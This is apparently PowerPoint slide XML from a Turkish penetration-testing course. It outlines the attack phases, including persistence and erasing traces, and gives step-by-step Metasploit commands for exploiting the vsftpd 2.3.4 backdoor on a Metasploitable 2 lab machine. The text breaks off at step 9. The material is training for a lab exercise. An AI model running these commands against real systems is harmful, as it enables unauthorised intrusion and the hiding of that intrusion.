                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8465CBA-4679-4383-91B7-002A63524328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7234767" y="2595673"/>
            <a:ext cx="2032000" cy="136161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2800" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ERİŞİMİ KORUMA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Dikdörtgen: Yuvarlatılmış Köşeler 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D97B3988-695F-409D-891A-6C16068E9495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9103784" y="798880"/>
            <a:ext cx="1943100" cy="13335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2800" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İZLERİ SİLME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Ok: Sağ 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A9D8EC-7C41-4FA9-8BD8-94B9B25DFB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2898551">
            <a:off x="3432898" y="1803156"/>
            <a:ext cx="584200" cy="75565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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Ok: Sağ 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F28AE7E-01F8-4416-AF0F-CA6A320FE1DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2860288">
            <a:off x="5086229" y="3686484"/>
            <a:ext cx="632016" cy="63156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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Ok: Sağ 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B7B515-D5CB-4747-836E-38C7E46B20F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19649019">
            <a:off x="6618522" y="3585816"/>
            <a:ext cx="558598" cy="70236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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Ok: Sağ 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16CCEB32-F943-41EC-9228-73B9967DF76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19266344">
            <a:off x="8470852" y="1876306"/>
            <a:ext cx="646409" cy="70445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2CAFFF8-8B96-4B24-865E-6334ED17FB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965933" y="0"/>
            <a:ext cx="8706242" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37198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FC1266B-CD30-4CA2-B4CE-1E99AFA3A75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522874" y="78910"/>
            <a:ext cx="9134856" cy="1035906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testi Aşamaları</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C71AD2B-4FC9-4580-AA29-DDEB9A00876D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522874" y="1302707"/>
            <a:ext cx="9236984" cy="4684734"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon testi süreci beş aşamaya kadar basitleştirilebilir:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keşif: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bir hedef sistem hakkında önemli bilgilerin toplanması eylemi. Bu bilgi hedefe daha iyi saldırmak için kullanılabilir. Örneğin, açık kaynaklı arama motorlarını kullanmak, bir sosyal mühendislik saldırısında kullanılabilecek verileri bulmak için kullanılabilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tarama: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Saldırganın sistem hakkındaki bilgisini ilerletmek için teknik araçlar kullanır. Örneğin, Nmap açık portları taramak için kullanılabilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Erişim Kazanma: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keşif ve tarama aşamalarında toplanan verileri kullanarak, saldırgan hedeflenen sisteme erişmek için bir araç kullanabilir. Örneğin, Metasploit bilinen güvenlik açıkları üzerindeki saldırıları otomatikleştirmek için kullanılabilir.   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61158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74D39C-0EC3-40FA-9D49-C7A679E1C3AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1528175" y="1127342"/>
            <a:ext cx="9135253" cy="4511459"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Erişimi Koruma: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Erişimi sürdürmek, mümkün olduğu kadar çok veri toplamak için hedef ortam içinde ısrarlı olmakla ilgili adımları atmayı gerektirir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İzleri Silme: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Saldırgan, anonim kalabilmek için, kurban sisteminin, her türlü verinin toplanması, olayların kaydedilmesinden kaynaklanan her türlü izi temizlemelidir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bir saldırgan bir güvenlik açığından yararlandıktan sonra, diğer makinelere erişebilir, böylece işlem tekrarlanır, yani yeni güvenlik açıkları arar ve bunları istismar etmeye çalışır. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428683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pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetrasyon Testi Uygulaması</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Alt Başlık 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VSFTPD Güvenlik Açığı Kullanılarak Hedef Sisteme Sızılması</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101CF4-D109-4830-815A-0689E7C8562F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296443" y="357803"/>
            <a:ext cx="9253854" cy="656806"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Framework ile Bir Alıştırmanın Adımları</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03527739-4081-4D13-8726-DED96C688739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102290" y="1114815"/>
            <a:ext cx="9857983" cy="4634631"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Terminal penceresinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazın ve ENTER’a basın. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit konsolunda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200"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yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit konsolunda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/ftp/vsftpd_234_backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yazın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">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ve ENTER’a basın. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set RHOST 192.168.2.42 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yazın ve ENTER’a basın (Metasploitable 2 IP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set RPORT 21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set LHOST 192.168.2.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200"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yazın ve ENTER’a basın (Kali IP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200"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yazın ve ENTER’a basın.  </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257229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527739-4081-4D13-8726-DED96C688739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290181" y="626302"/>
            <a:ext cx="9373247" cy="5035462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
